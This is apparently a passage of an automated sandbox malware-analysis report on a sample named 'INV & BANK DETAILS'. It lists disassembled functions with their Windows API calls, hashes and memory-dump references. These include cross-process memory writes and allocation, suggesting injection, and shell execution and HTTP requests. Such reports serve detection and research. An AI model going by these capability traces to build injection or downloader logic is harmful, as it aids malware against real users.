                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteObjectWindow$Icon
                                • String ID:
                                • API String ID: 4023252218-0
                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                APIs
                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                • DeleteObject.GDI32(?), ref: 00455736
                                • DeleteObject.GDI32(?), ref: 00455744
                                • DestroyIcon.USER32(?), ref: 00455752
                                • DestroyWindow.USER32(?), ref: 00455760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                • String ID:
                                • API String ID: 1489400265-0
                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                APIs
                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                • DestroyWindow.USER32(?), ref: 00455728
                                • DeleteObject.GDI32(?), ref: 00455736
                                • DeleteObject.GDI32(?), ref: 00455744
                                • DestroyIcon.USER32(?), ref: 00455752
                                • DestroyWindow.USER32(?), ref: 00455760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                • String ID:
                                • API String ID: 1042038666-0
                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                APIs
                                • __getptd.LIBCMT ref: 0041780F
                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                • __getptd.LIBCMT ref: 00417826
                                • __amsg_exit.LIBCMT ref: 00417834
                                • __lock.LIBCMT ref: 00417844
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                • String ID:
                                • API String ID: 938513278-0
                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                APIs
                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                • ExitThread.KERNEL32 ref: 004151ED
                                • __freefls@4.LIBCMT ref: 00415209
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                • String ID:
                                • API String ID: 4247068974-0
                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: )$U$\
                                • API String ID: 0-3705770531
                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                APIs
                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                • CoUninitialize.OLE32 ref: 0046E53D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 886957087-24824748
                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \
                                • API String ID: 4104443479-2967466578
                                • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \
                                • API String ID: 4104443479-2967466578
                                • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \
                                • API String ID: 4104443479-2967466578
                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                Strings
                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                • API String ID: 708495834-557222456
                                • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                APIs
                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                • String ID: @
                                • API String ID: 4150878124-2766056989
                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: \$]$h
                                • API String ID: 4104443479-3262404753
                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                APIs
                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                • String ID: <$@
                                • API String ID: 2417854910-1426351568
                                • Opcode ID: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                • Opcode Fuzzy Hash: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                APIs
                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                • String ID:
                                • API String ID: 3705125965-3916222277
                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                APIs
                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$Delete$InfoItem
                                • String ID: 0
                                • API String ID: 135850232-4108050209
                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                APIs
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
